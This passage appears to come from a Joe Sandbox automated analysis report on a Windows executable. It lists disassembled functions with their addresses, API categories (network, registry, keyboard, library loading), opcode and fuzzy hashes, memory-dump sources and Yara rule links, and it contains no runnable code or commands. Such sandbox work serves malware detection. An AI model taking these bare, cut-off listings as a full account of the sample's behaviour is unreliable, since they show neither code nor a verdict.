                                                                                          • Associated: 0000000E.00000002.1669551837.00007FF74D11A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669580109.00007FF74D124000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_14_2_7ff74d030000_BFmcYQ.jbxd
                                                                                          Similarity
                                                                                          • API ID: FileFullNamePath$MoveOperationlstrcmpiwcscat
                                                                                          • String ID: \*.*
                                                                                          • API String ID: 3196045410-1173974218
                                                                                          • Opcode ID: 19a9c623901bedbfdd4e3d81bd8b065a0a92971c24d4d3071b995089b4c63289
                                                                                          • Instruction ID: cfe9dac86ac3fc0db8436bc54fd84e8c03d57ac7af76cc7333a606fcc1dd8d52
                                                                                          • Opcode Fuzzy Hash: 19a9c623901bedbfdd4e3d81bd8b065a0a92971c24d4d3071b995089b4c63289
                                                                                          • Instruction Fuzzy Hash: E9412F26A0C642D5EB20FB24D8401FDA760FFA5788FC50135D98D57BA9FF28D909C720
                                                                                          Function 00007FF74D09DF3C Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 92windowCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000E.00000002.1669381320.00007FF74D031000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF74D030000, based on PE: true
                                                                                          • Associated: 0000000E.00000002.1669350010.00007FF74D030000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669482219.00007FF74D0E5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669482219.00007FF74D108000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669551837.00007FF74D11A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669580109.00007FF74D124000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_14_2_7ff74d030000_BFmcYQ.jbxd
                                                                                          Similarity
                                                                                          • API ID: MessageSend$ClassName
                                                                                          • String ID: ComboBox$ListBox
                                                                                          • API String ID: 787153527-1403004172
                                                                                          • Opcode ID: bcdae5920d2d928eb4967bcf07730aedcb02b36852307e6df1d0eb8a4287a533
                                                                                          • Instruction ID: 8b35f8dbda01637e80cc674240ac85e25f25ac2e454c7731f7597928c4067caa
                                                                                          • Opcode Fuzzy Hash: bcdae5920d2d928eb4967bcf07730aedcb02b36852307e6df1d0eb8a4287a533
                                                                                          • Instruction Fuzzy Hash: B131A222A1D682C2EA20FB15E4551BDA361FBC9B80FC44631DEDD477A5EE3CE546C720
                                                                                          Function 00007FF74D0BD914 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 86networkCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000E.00000002.1669381320.00007FF74D031000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF74D030000, based on PE: true
                                                                                          • Associated: 0000000E.00000002.1669350010.00007FF74D030000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669482219.00007FF74D0E5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669482219.00007FF74D108000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669551837.00007FF74D11A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669580109.00007FF74D124000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_14_2_7ff74d030000_BFmcYQ.jbxd
                                                                                          Similarity
                                                                                          • API ID: HttpInternet$CloseErrorEventHandleInfoLastOpenQueryRequestSend
                                                                                          • String ID:
                                                                                          • API String ID: 3113390036-3916222277
                                                                                          • Opcode ID: fe032384e3ae49ab6650df1e9e36687832eb56e7d0293f7a573cd5f7425b5e8f
                                                                                          • Instruction ID: 6b02e348344be879f71795ebfa6d9578349db6541cc6a9f2b22d588158fedf0d
                                                                                          • Opcode Fuzzy Hash: fe032384e3ae49ab6650df1e9e36687832eb56e7d0293f7a573cd5f7425b5e8f
                                                                                          • Instruction Fuzzy Hash: 7531B622A1C642C5FB60BF52A414BBAE350FB84B80F945131DE8E57B65EE3CD4028B60
                                                                                          Function 00007FF74D0D93E8 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 76windowlibraryCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000E.00000002.1669381320.00007FF74D031000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF74D030000, based on PE: true
                                                                                          • Associated: 0000000E.00000002.1669350010.00007FF74D030000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669482219.00007FF74D0E5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669482219.00007FF74D108000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669551837.00007FF74D11A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669580109.00007FF74D124000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_14_2_7ff74d030000_BFmcYQ.jbxd
                                                                                          Similarity
                                                                                          • API ID: MessageSend$Window$CreateDestroyLibraryLoadObjectStock
                                                                                          • String ID: SysAnimate32
                                                                                          • API String ID: 4146253029-1011021900
                                                                                          • Opcode ID: 3e4d22fa235855ff4f2554ab96e3220b01af827ee5636b6f724e9c857c26afd0
                                                                                          • Instruction ID: 9a08d8570fa501fdb8c9924ba181cb5f65d43434eb10eb664def657a4b7b9eff
                                                                                          • Opcode Fuzzy Hash: 3e4d22fa235855ff4f2554ab96e3220b01af827ee5636b6f724e9c857c26afd0
                                                                                          • Instruction Fuzzy Hash: 54317072A0D7C1CAE760AF24E45476AB3A0FB85780F904239DAAD07B98EF3DD444CB10
                                                                                          Function 00007FF74D059164 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 29libraryloaderCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000E.00000002.1669381320.00007FF74D031000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF74D030000, based on PE: true
                                                                                          • Associated: 0000000E.00000002.1669350010.00007FF74D030000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669482219.00007FF74D0E5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669482219.00007FF74D108000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669551837.00007FF74D11A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669580109.00007FF74D124000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_14_2_7ff74d030000_BFmcYQ.jbxd
                                                                                          Similarity
                                                                                          • API ID: AddressFreeHandleLibraryModuleProc
                                                                                          • String ID: CorExitProcess$mscoree.dll
                                                                                          • API String ID: 4061214504-1276376045
                                                                                          • Opcode ID: ec043f9b6fed639492fe08c1f7567e430e68234150a908e2993f018ebf9edeab
                                                                                          • Instruction ID: f21fe6bd8fe27f8326dc2b6cb65b4ae669ddaf7445ea6f288989e340eca5ec2d
                                                                                          • Opcode Fuzzy Hash: ec043f9b6fed639492fe08c1f7567e430e68234150a908e2993f018ebf9edeab
                                                                                          • Instruction Fuzzy Hash: F4F03C21A1DA46C1EE44BB11F498379A3A1EF8C790FC91435E98F47674EE3CD4888620
                                                                                          Function 00007FF74D0789B4 Relevance: 7.8, APIs: 5, Instructions: 265COMMONLIBRARYCODE
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000E.00000002.1669381320.00007FF74D031000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF74D030000, based on PE: true
                                                                                          • Associated: 0000000E.00000002.1669350010.00007FF74D030000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669482219.00007FF74D0E5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669482219.00007FF74D108000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669551837.00007FF74D11A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669580109.00007FF74D124000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_14_2_7ff74d030000_BFmcYQ.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 03f3b3863cf3428f55316b0c9d809bb68f76fa44e49f8ab79cf537312fbddc30
                                                                                          • Instruction ID: 78cde260eacdeaccb5dced4658265d4e01dd733df99f8318d81f21a881c504f3
                                                                                          • Opcode Fuzzy Hash: 03f3b3863cf3428f55316b0c9d809bb68f76fa44e49f8ab79cf537312fbddc30
                                                                                          • Instruction Fuzzy Hash: F8A1C262F0C782D6FB30BB6094003B9A691AF40BA4F984635DA9D0B7E5FF3CE4448320
                                                                                          Function 00007FF74D0C45A4 Relevance: 7.8, APIs: 5, Instructions: 250networkCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000E.00000002.1669381320.00007FF74D031000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF74D030000, based on PE: true
                                                                                          • Associated: 0000000E.00000002.1669350010.00007FF74D030000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669482219.00007FF74D0E5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669482219.00007FF74D108000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669551837.00007FF74D11A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669580109.00007FF74D124000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_14_2_7ff74d030000_BFmcYQ.jbxd
                                                                                          Similarity
                                                                                          • API ID: ErrorLasthtonsinet_ntoa
                                                                                          • String ID:
                                                                                          • API String ID: 2227131780-0
                                                                                          • Opcode ID: bd5e1163d7a9b305c8aebbe74614b584ebe830359c93ecb63b9e7e3e647e6822
                                                                                          • Instruction ID: 360f1a9787e032c6504463f085d87bd3914fec956bb3152afb0485797bcb3d11
                                                                                          • Opcode Fuzzy Hash: bd5e1163d7a9b305c8aebbe74614b584ebe830359c93ecb63b9e7e3e647e6822
                                                                                          • Instruction Fuzzy Hash: 43A1B222B0C682C6DB24FB26D9542BDA790FF85B94F804531DE8E477A9EF7CE5058720
                                                                                          Function 00007FF74D0CE838 Relevance: 7.7, APIs: 5, Instructions: 207COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000E.00000002.1669381320.00007FF74D031000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF74D030000, based on PE: true
                                                                                          • Associated: 0000000E.00000002.1669350010.00007FF74D030000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669482219.00007FF74D0E5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669482219.00007FF74D108000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669551837.00007FF74D11A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669580109.00007FF74D124000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_14_2_7ff74d030000_BFmcYQ.jbxd
                                                                                          Similarity
                                                                                          • API ID: Process$CloseCountersCurrentHandleOpen
                                                                                          • String ID:
                                                                                          • API String ID: 3488606520-0
                                                                                          • Opcode ID: 33f71eaf96c05a677f4ff7f9555289fe157d7a24ae1f8fdeb2073595f7ad5bbf
                                                                                          • Instruction ID: 7c23c892263882c969422f370b571f77fe6a3a64163a70c44d775b5e02080d1a
                                                                                          • Opcode Fuzzy Hash: 33f71eaf96c05a677f4ff7f9555289fe157d7a24ae1f8fdeb2073595f7ad5bbf
                                                                                          • Instruction Fuzzy Hash: 7C817C22B0C691C6EB14FF6294586ADA7A0BB48FD4F848035DE9D17BA6EF7CE401C750
                                                                                          Function 00007FF74D06ED08 Relevance: 7.7, APIs: 5, Instructions: 203COMMONLIBRARYCODE
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000E.00000002.1669381320.00007FF74D031000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF74D030000, based on PE: true
                                                                                          • Associated: 0000000E.00000002.1669350010.00007FF74D030000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669482219.00007FF74D0E5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669482219.00007FF74D108000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669551837.00007FF74D11A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669580109.00007FF74D124000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_14_2_7ff74d030000_BFmcYQ.jbxd
                                                                                          Similarity
                                                                                          • API ID: _invalid_parameter_noinfo
                                                                                          • String ID:
                                                                                          • API String ID: 3215553584-0
                                                                                          • Opcode ID: f29f2ab1c13e66daf1f8c2b4a146e68bdfc50a5cc3b930cf9745f903616afb6d
                                                                                          • Instruction ID: e58e693a721e510860deb325d8a883c6841c543e6763a940ff0e4dd8f58eebb0
                                                                                          • Opcode Fuzzy Hash: f29f2ab1c13e66daf1f8c2b4a146e68bdfc50a5cc3b930cf9745f903616afb6d
                                                                                          • Instruction Fuzzy Hash: B581AE22F1C712C5F720BBA598846BDA6A0BB44B48F808135DE8E176F5EE3CE446C720
                                                                                          Function 00007FF74D0D02DC Relevance: 7.7, APIs: 5, Instructions: 159registryCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000E.00000002.1669381320.00007FF74D031000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF74D030000, based on PE: true
                                                                                          • Associated: 0000000E.00000002.1669350010.00007FF74D030000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669482219.00007FF74D0E5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669482219.00007FF74D108000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669551837.00007FF74D11A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669580109.00007FF74D124000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_14_2_7ff74d030000_BFmcYQ.jbxd
                                                                                          Similarity
                                                                                          • API ID: Close$BuffCharConnectEnumOpenRegistryUpperValue
                                                                                          • String ID:
                                                                                          • API String ID: 3451389628-0
                                                                                          • Opcode ID: ea71e9f73f70926a53419fade0107dc191ca266b6e1703fbb57f8f6819cd1ab3
                                                                                          • Instruction ID: 15e7f2c8db351ba20ddc468483e2bb1e27297359202344019364198d1c466b04
                                                                                          • Opcode Fuzzy Hash: ea71e9f73f70926a53419fade0107dc191ca266b6e1703fbb57f8f6819cd1ab3
                                                                                          • Instruction Fuzzy Hash: 72715F72B0CA42CAEB10FFA5D5543FC6760EB84788F814532DA8D57A66EF78D145C360
                                                                                          Function 00007FF74D06E67C Relevance: 7.6, APIs: 5, Instructions: 142fileCOMMONLIBRARYCODE
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000E.00000002.1669381320.00007FF74D031000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF74D030000, based on PE: true
                                                                                          • Associated: 0000000E.00000002.1669350010.00007FF74D030000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669482219.00007FF74D0E5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669482219.00007FF74D108000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669551837.00007FF74D11A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669580109.00007FF74D124000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_14_2_7ff74d030000_BFmcYQ.jbxd
                                                                                          Similarity
                                                                                          • API ID: FileWrite$ByteCharConsoleErrorLastMultiWide
                                                                                          • String ID:
                                                                                          • API String ID: 3659116390-0
                                                                                          • Opcode ID: 565e37f08fcc29d8b24d7793246010796331880618d15c7c8224c4ccd3a000f5
                                                                                          • Instruction ID: 1644937c486dfb91c71157f83880f462d462d3744b9cad328d41c9c13d4f91ce
                                                                                          • Opcode Fuzzy Hash: 565e37f08fcc29d8b24d7793246010796331880618d15c7c8224c4ccd3a000f5
                                                                                          • Instruction Fuzzy Hash: 31519432B1CA51C9E750EB65E4443ACBBB0FB48B98F448135DE9D476A9EF38D145C720
                                                                                          Function 00007FF74D0D0084 Relevance: 7.6, APIs: 5, Instructions: 141registryCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000E.00000002.1669381320.00007FF74D031000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF74D030000, based on PE: true
                                                                                          • Associated: 0000000E.00000002.1669350010.00007FF74D030000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669482219.00007FF74D0E5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669482219.00007FF74D108000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669551837.00007FF74D11A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669580109.00007FF74D124000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_14_2_7ff74d030000_BFmcYQ.jbxd
                                                                                          Similarity
                                                                                          • API ID: Close$BuffCharConnectEnumOpenRegistryUpper
                                                                                          • String ID:
                                                                                          • API String ID: 3740051246-0
                                                                                          • Opcode ID: bd38130d0a6c74a4fb364d1ff2c50e7e9d7a3923237d5797147a29dace5ff8d3
                                                                                          • Instruction ID: 56d0817108c6a8093186fd56267b6926a5e74241d3e6a61c4b49d5a6f4be4be7
                                                                                          • Opcode Fuzzy Hash: bd38130d0a6c74a4fb364d1ff2c50e7e9d7a3923237d5797147a29dace5ff8d3
                                                                                          • Instruction Fuzzy Hash: 44616022A0CA86C6EB10FB65E4943BDB760FB84784F804132EA8D47A7AEF7CD545C750
                                                                                          Function 00007FF74D0CD0F8 Relevance: 7.6, APIs: 5, Instructions: 139libraryloaderCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00007FF74D0CC2BF), ref: 00007FF74D0CD176
                                                                                          • GetProcAddress.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00007FF74D0CC2BF), ref: 00007FF74D0CD217
                                                                                          • GetProcAddress.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00007FF74D0CC2BF), ref: 00007FF74D0CD236
                                                                                          • GetProcAddress.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00007FF74D0CC2BF), ref: 00007FF74D0CD281
                                                                                          • FreeLibrary.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00007FF74D0CC2BF), ref: 00007FF74D0CD2A0
                                                                                            • Part of subcall function 00007FF74D054120: WideCharToMultiByte.KERNEL32 ref: 00007FF74D054160
                                                                                            • Part of subcall function 00007FF74D054120: WideCharToMultiByte.KERNEL32 ref: 00007FF74D05419C
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000E.00000002.1669381320.00007FF74D031000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF74D030000, based on PE: true
                                                                                          • Associated: 0000000E.00000002.1669350010.00007FF74D030000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669482219.00007FF74D0E5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669482219.00007FF74D108000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669551837.00007FF74D11A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669580109.00007FF74D124000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_14_2_7ff74d030000_BFmcYQ.jbxd
                                                                                          Similarity
                                                                                          • API ID: AddressProc$ByteCharLibraryMultiWide$FreeLoad
                                                                                          • String ID:
                                                                                          • API String ID: 666041331-0
                                                                                          • Opcode ID: c3fd7c48fc9f9c2f8ece9fb323df923621d5475b61cd025522e48c4117cd4c81
                                                                                          • Instruction ID: 55dfae356591f853cbaf4272cb8478b135c7ed0279cd941d2394faeb5a42bbe3
                                                                                          • Opcode Fuzzy Hash: c3fd7c48fc9f9c2f8ece9fb323df923621d5475b61cd025522e48c4117cd4c81
                                                                                          • Instruction Fuzzy Hash: 7C512836A1CB16C6EB04FF66D9941ACA3A4FB98F84B854432DE9E47365EF78D441C320
                                                                                          Function 00007FF74D0A670C Relevance: 7.6, APIs: 5, Instructions: 135COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000E.00000002.1669381320.00007FF74D031000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF74D030000, based on PE: true
                                                                                          • Associated: 0000000E.00000002.1669350010.00007FF74D030000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669482219.00007FF74D0E5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669482219.00007FF74D108000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669551837.00007FF74D11A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669580109.00007FF74D124000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_14_2_7ff74d030000_BFmcYQ.jbxd
                                                                                          Similarity
                                                                                          • API ID: Variant$Clear$ChangeInitType
                                                                                          • String ID:
                                                                                          • API String ID: 4136290138-0
                                                                                          • Opcode ID: 5bf158a84cb56ccb7168b4d37c167f5e8b54303454597cac92653ddc8f5d8736
                                                                                          • Instruction ID: fd1eef9bcc6d8fd902be2b5a828aedfdece5b706576625678148067767ceb0a7
                                                                                          • Opcode Fuzzy Hash: 5bf158a84cb56ccb7168b4d37c167f5e8b54303454597cac92653ddc8f5d8736
                                                                                          • Instruction Fuzzy Hash: A8515677629A45D2DB50EF15D4887AD73B8FB94B80F828222CB8D47764EF39E458C710
                                                                                          Function 00007FF74D072998 Relevance: 7.6, APIs: 5, Instructions: 133COMMONLIBRARYCODE
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000E.00000002.1669381320.00007FF74D031000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF74D030000, based on PE: true
                                                                                          • Associated: 0000000E.00000002.1669350010.00007FF74D030000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669482219.00007FF74D0E5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669482219.00007FF74D108000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669551837.00007FF74D11A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669580109.00007FF74D124000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_14_2_7ff74d030000_BFmcYQ.jbxd
                                                                                          Similarity
                                                                                          • API ID: _invalid_parameter_noinfo
                                                                                          • String ID:
                                                                                          • API String ID: 3215553584-0
                                                                                          • Opcode ID: 69caafc8f8afcb53c87a7f7053d9646584506dbe7d8e8e6cfd9f4db44817ad77
                                                                                          • Instruction ID: 0aeaf8c9646318a038954939b950f96bfc08526decacd2d255e583749901657c
                                                                                          • Opcode Fuzzy Hash: 69caafc8f8afcb53c87a7f7053d9646584506dbe7d8e8e6cfd9f4db44817ad77
                                                                                          • Instruction Fuzzy Hash: CF518222A0C782D6EA60BF219444179F7A5EF44BA0F994235DAED0B6F5EE3CE451C720
                                                                                          Function 00007FF74D0B96A8 Relevance: 7.6, APIs: 5, Instructions: 128COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000E.00000002.1669381320.00007FF74D031000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF74D030000, based on PE: true
                                                                                          • Associated: 0000000E.00000002.1669350010.00007FF74D030000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669482219.00007FF74D0E5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669482219.00007FF74D108000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669551837.00007FF74D11A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669580109.00007FF74D124000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_14_2_7ff74d030000_BFmcYQ.jbxd
                                                                                          Similarity
                                                                                          • API ID: PrivateProfile$SectionWrite$String
                                                                                          • String ID:
                                                                                          • API String ID: 2832842796-0
                                                                                          • Opcode ID: 95fb2e0a0683671ba085f2766c906dafb1032fc97baa3117c4aba2321f0fd2dc
                                                                                          • Instruction ID: 38958001f6d4729c669ad5873b4866aeda444a4061c01c8d2e73dc6daa998169
                                                                                          • Opcode Fuzzy Hash: 95fb2e0a0683671ba085f2766c906dafb1032fc97baa3117c4aba2321f0fd2dc
                                                                                          • Instruction Fuzzy Hash: C7510926A1CA46C2DB14FF26E494269B7A0FB89F94B448432EE8E47766DF7CD440C760
                                                                                          Function 00007FF74D031CEC Relevance: 7.6, APIs: 5, Instructions: 124keyboardCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000E.00000002.1669381320.00007FF74D031000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF74D030000, based on PE: true
                                                                                          • Associated: 0000000E.00000002.1669350010.00007FF74D030000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669482219.00007FF74D0E5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669482219.00007FF74D108000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669551837.00007FF74D11A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669580109.00007FF74D124000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_14_2_7ff74d030000_BFmcYQ.jbxd
                                                                                          Similarity
                                                                                          • API ID: AsyncState$ClientCursorScreen
                                                                                          • String ID:
                                                                                          • API String ID: 4210589936-0
                                                                                          • Opcode ID: 66afa1c94deaf905156041cf676ffe3a2b02e9b0039980c06c23d4dff2918920
                                                                                          • Instruction ID: d5dab58ba48fca850889399c2dc1f0cab3a7499c767d0c7ca045c8939a4fd8e4
                                                                                          • Opcode Fuzzy Hash: 66afa1c94deaf905156041cf676ffe3a2b02e9b0039980c06c23d4dff2918920
